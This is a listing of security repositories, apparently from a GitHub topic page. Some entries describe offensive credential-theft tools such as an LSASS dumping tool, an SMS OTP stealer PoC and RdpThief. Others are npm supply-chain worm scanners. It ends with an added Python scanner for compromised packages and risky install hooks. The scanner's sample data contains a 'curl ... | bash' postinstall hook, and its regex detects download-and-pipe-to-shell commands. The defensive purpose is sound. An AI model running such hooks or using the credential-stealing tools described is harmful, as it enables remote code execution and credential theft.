Physmem2profit can be used to create a minidump of a target host's LSASS process by analysing physical memory remotely
Updated Jul 27, 2022 - C#
Detect npm packages compromised in the Shai-Hulud 2.0 supply chain attack (Nov 2025). Scans for 790+ malicious packages, suspicious scripts, TruffleHog activity, SHA1HULUD runners, and secrets exfiltration. GitHub Action with SARIF support.
Thumper is an open-source tripwire for the Shai-Hulud npm worm. Plant fake-but-realistic credentials where the worm scans - the instant one is read, you know the box might be breached. Free and built in the open by Jesta.
This repo documents a vulnerability in Siri Shortcuts and Shared Web Credentials (SWC) allowing malformed payloads to persistently execute, trigger retry storms, bypass TLS validation, and request unauthorized entitlements. Confirmed on iOS 18.6.2 with potential iCloud-based propagation.
Android overlay attack & SMS OTP stealer PoC using AccessibilityService — security research only
Runtime dependency-behavior monitor for Node.js. Two engines: in-process telemetry + an out-of-process (strace) trust boundary that sees native egress & persistence. Defense-in-depth for npm supply-chain attacks — SARIF, GitHub Action, zero deps.
Analysis, IOCs, detection rules, and removal scripts for the ChatGPT Plus Free Trial cross-platform info-stealer (macOS + Windows)
Proof of Concept: NTLMv2 Hash Capture via Microsoft Teams onenote:// URI
Forensic dataset + live dashboard for the 2026-04-29 'A Mini Shai-Hulud has Appeared' npm supply-chain worm by TeamPCP. 1,117 dropbox repos, 22 compromised accounts, 47 IOCs across 14 kinds. Trojaned: @cap-js, mbt, @bitwarden/cli. C2 attribution to AS209101 IP Vendetta Inc. JSONL data · kinetic dashboard · CC-BY-4.0.
A DLL injection of RdpThief.dll to perform API hooking and extract RDP credentials
Retrieve user credentials via the Windows API and save them to a file.
This case study documents a stealthy credential-harvesting technique in which the attacker used a lightweight binary (browserdump.exe) to extract stored credentials from browser cache files—specifically Chrome and Edge—without elevating privileges or triggering persistence indicators.
Cross-platform personal browser credential DLP monitor. Linux: fanotify blocking | Windows: NtQueryInfo polling. Blocks infostealers from reading cookies/passwords in real-time.
AD (Active Directory) Service Account Manager is an enterprise-grade PowerShell framework that codifies identity lifecycle management and eliminates identity debt within Active Directory. It transitions organizations away from fragmented, manual service account management into a structured, audited, and automated governance model.
🛡️ SkillsSafe: A security scanner for SKILL.md, MCP configs, and system prompts to detect exfiltration, shell injection, and hidden threats.
Threat-intel teardown + keyless live tracker of a multi-brand marketplace phishing-as-a-service (PhaaS) operation (Classiscam/Telekopye class) impersonating OLX, Subito, Kleinanzeigen & ~120 brands to steal card data + 3-D Secure/OTP. IOCs, kit analysis, detection signatures.
🛡️ Guard your projects against the Shai-Hulud 2.0 npm supply chain attack with our secure detection tool for safer development.
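The two Shai-Hulud 2.0 scanners listed above (the 790+ package IOC scanner and this one) both reduce to the same two checks: compare every installed package@version against a compromised-package list, and flag install-time lifecycle scripts that fetch or execute arbitrary code. The following is an added example of those checks written for this page; it is not code from either project. The IOC entries, the sample package-lock.json and package.json, and the script heuristics are all constructed placeholders, not the real Shai-Hulud 2.0 indicators, so a real feed must be substituted before use.

```python
"""Scan an npm project for known-compromised package versions and for
suspicious install-time scripts. Added example; IOC list is constructed."""
import json
import re
from typing import Dict, List, Set, Tuple

# Constructed placeholder IOCs (name, version); NOT the real Shai-Hulud list.
COMPROMISED: Set[Tuple[str, str]] = {
    ("example-ui-kit", "4.2.1"),
    ("@acme/telemetry", "1.0.9"),
}

# npm runs these hooks automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics: downloads, pipe-to-shell, secret scanners, or
# running a bundled JS file at install time.
SUSPICIOUS_SCRIPT = re.compile(
    r"(curl|wget)\s|\|\s*(sh|bash)\b|trufflehog|"
    r"\b(node|bun)\s+\S+\.(js|mjs|cjs)\b",
    re.IGNORECASE,
)


def installed_packages(lockfile: dict) -> Dict[str, str]:
    """Return {name: version} for a lockfile v2/v3 'packages' map, falling
    back to the top level of a v1 'dependencies' map."""
    found: Dict[str, str] = {}
    for path, meta in lockfile.get("packages", {}).items():
        if not path:  # "" is the root project itself, not a dependency
            continue
        # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
        name = path.rsplit("node_modules/", 1)[-1]
        if "version" in meta:
            found[name] = meta["version"]
    for name, meta in lockfile.get("dependencies", {}).items():
        if "version" in meta:
            found.setdefault(name, meta["version"])
    return found


def find_compromised(lockfile: dict, iocs=COMPROMISED) -> List[Tuple[str, str]]:
    """Exact (name, version) matches against the IOC set, sorted for stable output."""
    return sorted((n, v) for n, v in installed_packages(lockfile).items() if (n, v) in iocs)


def find_suspicious_scripts(package_json: dict) -> List[Tuple[str, str]]:
    """Lifecycle hooks whose command matches the install-time heuristics."""
    hits = []
    scripts = package_json.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd and SUSPICIOUS_SCRIPT.search(cmd):
            hits.append((hook, cmd))
    return hits


def scan(lockfile: dict, package_json: dict) -> dict:
    return {
        "compromised": find_compromised(lockfile),
        "suspicious_scripts": find_suspicious_scripts(package_json),
    }


# Constructed sample inputs: a nested compromised dependency and a package.json
# with one benign build script and two suspicious install hooks.
SAMPLE_LOCK = json.loads("""{
  "name": "demo-app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "version": "0.1.0"},
    "node_modules/left-pad": {"version": "1.3.0"},
    "node_modules/example-ui-kit": {"version": "4.2.1"},
    "node_modules/example-ui-kit/node_modules/@acme/telemetry": {"version": "1.0.9"}
  }
}""")
SAMPLE_PKG = json.loads("""{
  "name": "demo-app",
  "scripts": {
    "build": "tsc -p .",
    "preinstall": "node setup_env.js",
    "postinstall": "curl -s https://example.invalid/x | bash"
  }
}""")

if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_LOCK, SAMPLE_PKG), indent=2))
```

Version matching is exact on purpose: a worm that republishes an existing package bumps to a specific malicious version, so a semver-range match would produce false positives on the clean releases around it. The script heuristics are coarse; in practice they belong on every dependency's package.json under node_modules, not only the root project's.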